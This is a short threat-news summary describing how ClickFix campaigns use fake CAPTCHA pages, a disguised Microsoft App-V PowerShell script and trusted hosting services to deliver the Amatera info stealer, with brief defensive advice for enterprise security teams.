ClickFix Attacks Expand Using Fake CAPTCHAs, Microsoft Scripts, and Trusted Web Services

ClickFix is evolving its attack game, using fake CAPTCHAs and a legit-looking Microsoft App-V script to drop Amatera stealer on enterprise Windows systems. This isn't your grandma's malware—it's a sophisticated operation that's leveling up.

The attack kicks off with a fake CAPTCHA page that's actually a social engineering trap. Once you click, it downloads a PowerShell script that masquerades as a Microsoft-signed App-V script. This script then pulls the Amatera stealer from trusted web services like GitHub or Pastebin, making it look like normal traffic.

Amatera is no joke—it's an info stealer that snatches browser data, crypto wallets, and system info. It uses living-off-the-land techniques, blending in with legit processes to avoid detection. This is enterprise-level targeting, not some random spam.

The attack chain is slick: fake CAPTCHA → PowerShell script → download from trusted services → deploy Amatera. It's designed to bypass security tools by using signed scripts and common web platforms.

Key takeaways: ClickFix is getting craftier, using Microsoft's own tools against you. If you're in enterprise security, watch for unusual PowerShell activity and CAPTCHA pages that feel off. This is a reminder that even trusted services can be weaponized.